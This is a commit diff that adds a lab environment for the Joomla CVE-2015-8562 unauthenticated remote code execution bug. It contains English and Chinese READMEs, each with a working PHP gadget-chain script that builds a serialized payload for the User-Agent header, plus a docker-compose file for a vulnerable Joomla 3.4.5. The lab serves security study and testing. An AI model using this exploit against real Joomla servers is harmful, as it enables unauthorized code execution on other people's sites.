first commit

joomla/CVE-2015-8562/README.md

@@ -0,0 +1,82 @@
+# Joomla HTTP Header Unauthenticated Remote Code Execution (CVE-2015-8562)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Joomla is a free and open-source content management system (CMS) that allows users to build websites and online applications. It was first released in 2005 and has since become one of the most popular CMS platforms, powering millions of websites around the world.
+
+Joomla suffers from an unauthenticated remote code execution that affects all versions from 1.5.0 to 3.4.5. By storing user supplied headers in the databases session table it's possible to truncate the input by sending an 4-bytes UTF-8 character. The custom created payload is then executed once the session is read from the database. You also need to have a PHP version before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13.
+
+References:
+
+- <https://packetstormsecurity.com/files/134949/Joomla-HTTP-Header-Unauthenticated-Remote-Code-Execution.html>
+- <https://www.leavesongs.com/PENETRATION/joomla-unserialize-code-execute-vulnerability.html>
+
+## Vulnerable Environment
+
+Executing following command to start a Joomla 3.4.5:
+
+```
+docker compose up -d
+```
+
+After the server is started, you can see the home page of it at `http://your-ip:8080`.
+
+## Exploit
+
+First of all, you need to send a request without User-Agent header and remember the Cookie in the response:
+
+![](2.png)
+
+Then use this script to generate a payload ([execute online](https://onlinephp.io/c/e824b)):
+
+```php
+<?php
+class JSimplepieFactory {
+}
+class JDatabaseDriverMysql {
+
+}
+class SimplePie {
+    var $sanitize;
+    var $cache;
+    var $cache_name_function;
+    var $javascript;
+    var $feed_url;
+    function __construct()
+    {
+        $this->feed_url = "phpinfo();JFactory::getConfig();exit;";
+        $this->javascript = 9999;
+        $this->cache_name_function = "assert";
+        $this->sanitize = new JDatabaseDriverMysql();
+        $this->cache = true;
+    }
+}
+
+class JDatabaseDriverMysqli {
+    protected $a;
+    protected $disconnectHandlers;
+    protected $connection;
+    function __construct()
+    {
+        $this->a = new JSimplepieFactory();
+        $x = new SimplePie();
+        $this->connection = 1;
+        $this->disconnectHandlers = [
+            [$x, "init"],
+        ];
+    }
+}
+
+$a = new JDatabaseDriverMysqli();
+$poc = serialize($a); 
+
+$poc = str_replace("\x00*\x00", '\\0\\0\\0', $poc);
+
+echo "123}__test|{$poc}\xF0\x9D\x8C\x86";
+```
+
+![](1.png)
+
+Put this craft payload into User-Agent header with Cookie obtained earlier then send request again. As you can see, our code `phpinfo()` is executed:
+
+![](3.png)

joomla/CVE-2015-8562/README.zh-cn.md

@@ -0,0 +1,86 @@
+# Joomla 3.4.5 反序列化漏洞（CVE-2015-8562）
+
+Joomla是一个开源免费的内容管理系统（CMS），基于PHP开发。
+
+本漏洞根源是PHP5.6.13前的版本在读取存储好的session时，如果反序列化出错则会跳过当前一段数据而去反序列化下一段数据。而Joomla将session存储在Mysql数据库中，编码是utf8，当我们插入4字节的utf8数据时则会导致截断。截断后的数据在反序列化时就会失败，最后触发反序列化漏洞。
+
+通过Joomla中的Gadget，可造成任意代码执行的结果。
+
+详情可参考：
+
+ - https://www.leavesongs.com/PENETRATION/joomla-unserialize-code-execute-vulnerability.html
+
+影响版本
+
+ - Joomla 1.5.x, 2.x, and 3.x before 3.4.6
+ - PHP 5.6 < 5.6.13, PHP 5.5 < 5.5.29 and PHP 5.4 < 5.4.45
+
+## 测试环境
+
+启动测试环境：
+
+```
+docker compose up -d
+```
+
+启动后访问`http://your-ip:8080/`即可看到Joomla的首页，包含测试数据。
+
+## 漏洞复现
+
+然后我们不带User-Agent头，先访问一次目标主页，记下服务端返回的Cookie：
+
+![](2.png)
+
+再用如下脚本生成POC：（[在线运行](https://onlinephp.io/c/e824b)）
+
+```php
+<?php
+class JSimplepieFactory {
+}
+class JDatabaseDriverMysql {
+
+}
+class SimplePie {
+    var $sanitize;
+    var $cache;
+    var $cache_name_function;
+    var $javascript;
+    var $feed_url;
+    function __construct()
+    {
+        $this->feed_url = "phpinfo();JFactory::getConfig();exit;";
+        $this->javascript = 9999;
+        $this->cache_name_function = "assert";
+        $this->sanitize = new JDatabaseDriverMysql();
+        $this->cache = true;
+    }
+}
+
+class JDatabaseDriverMysqli {
+    protected $a;
+    protected $disconnectHandlers;
+    protected $connection;
+    function __construct()
+    {
+        $this->a = new JSimplepieFactory();
+        $x = new SimplePie();
+        $this->connection = 1;
+        $this->disconnectHandlers = [
+            [$x, "init"],
+        ];
+    }
+}
+
+$a = new JDatabaseDriverMysqli();
+$poc = serialize($a); 
+
+$poc = str_replace("\x00*\x00", '\\0\\0\\0', $poc);
+
+echo "123}__test|{$poc}\xF0\x9D\x8C\x86";
+```
+
+![](1.png)
+
+将生成好的POC作为User-Agent，带上第一步获取的Cookie发包，这一次发包，脏数据进入Mysql数据库。然后同样的包再发一次，我们的代码被执行：
+
+![](3.png)

joomla/CVE-2015-8562/docker-compose.yml

@@ -0,0 +1,18 @@
+version: '2'
+services:
+ web:
+   image: vulhub/joomla:3.4.5
+   depends_on:
+    - mysql
+   environment: 
+    - JOOMLA_DB_HOST=mysql
+    - JOOMLA_DB_PORT=3306
+    - JOOMLA_DB_USER=root
+    - JOOMLA_DB_PASSWORD=vulhub
+    - JOOMLA_DB_NAME=joomla
+   ports:
+    - "8080:80"
+ mysql:
+   image: mysql:5.5
+   environment: 
+    - MYSQL_ROOT_PASSWORD=vulhub